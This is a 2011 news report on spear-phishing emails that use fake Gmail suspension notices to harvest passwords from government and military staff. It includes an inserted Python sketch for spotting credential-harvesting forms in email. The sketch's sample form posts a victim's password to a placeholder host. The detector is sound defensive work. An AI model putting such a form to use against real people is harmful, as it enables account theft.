Aug 16, 2011 15:01 GMT

Security researchers warn that spear phishing attacks continue to target the personal Gmail accounts of people working for the military, government agencies or contractors.

"Once compromises happen and are covered in the news, they do not disappear and attackers don't give up or stop. They continue their business as usual," writes independent security researcher Mila Parkour.

Parkour, who played an important role in investigating the original wave of attacks in June, analyzed a new campaign that generates emails posing as account suspension notifications.

The subject of the emails is "CNAS Report Calls Declining Satellite Capabilities National Security Concern," the title of a real press release from the Center for a New American Security (CNAS).

The email claims the recipient's account was suspended for unusual activity that may involve handling a large quantity of email over POP or IMAP, sending a large number of undeliverable messages, using browser extensions that automate authentication, or leaving multiple instances of Gmail open, among others.

The email contains a login form and instructs users to authenticate in order to re-activate their account. The recipient's address is already filled into the form.

Parkour created a dummy account, populated it with email messages that attackers would be interested in, including some in Chinese, and submitted its login details via the form.

The stolen passwords were sent to a location on a legitimate but compromised website. In less than two hours, the attackers accessed the account from a Tor exit node in the Netherlands, showing that they go to great lengths to cover their tracks.
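A mail filter can check for the pattern described above: a sign-in form inside the message body, the recipient's address prefilled, and credentials posted to a third-party site. The following Python sketch is an added example, not taken from the researcher's analysis; the trusted-host list, the function names and the sample message are assumptions constructed for illustration.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse

# Assumption: hosts where a Google sign-in form may legitimately post.
TRUSTED_SUFFIXES = ("google.com",)

class FormScanner(HTMLParser):
    """Collect every <form> with its action URL and the <input> tags inside it."""
    def __init__(self):
        super().__init__()
        self.forms, self._current = [], None

    def handle_starttag(self, tag, attrs):
        a = {k: (v or "") for k, v in attrs}
        if tag == "form":
            self._current = {"action": a.get("action", ""), "inputs": []}
            self.forms.append(self._current)
        elif tag == "input" and self._current is not None:
            self._current["inputs"].append(a)

    def handle_endtag(self, tag):
        if tag == "form":
            self._current = None

def is_trusted(host):
    host = host.lower().rstrip(".")
    return any(host == s or host.endswith("." + s) for s in TRUSTED_SUFFIXES)

def phishing_form_findings(html_body, recipient):
    """Return reasons an HTML email body looks like a credential-harvesting form."""
    scanner = FormScanner()
    scanner.feed(html_body)
    findings = []
    for form in scanner.forms:
        if not any(i.get("type", "").lower() == "password" for i in form["inputs"]):
            continue  # forms without a password field are out of scope here
        findings.append("password field in email body")
        if any(i.get("value", "").strip().lower() == recipient.lower() for i in form["inputs"]):
            findings.append("recipient address prefilled")
        host = urlparse(form["action"]).hostname or ""
        if not is_trusted(host):
            findings.append("credentials post to untrusted host: " + (host or "(none)"))
    return findings

# Constructed sample body; the host and address are placeholders, not real indicators.
SAMPLE = """<form action="http://compromised.example/save.php" method="post">
<input type="text" name="Email" value="user@example.com">
<input type="password" name="Passwd">
<input type="submit" value="Sign in"></form>"""
print(phishing_form_findings(SAMPLE, "user@example.com"))
```
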

"Google are aware of this, there is not much they can do to prevent these from coming in but I am sure they are trying. If you are concerned about your account safety, please use two-factor authentication and change your passwords often," Parkour advises.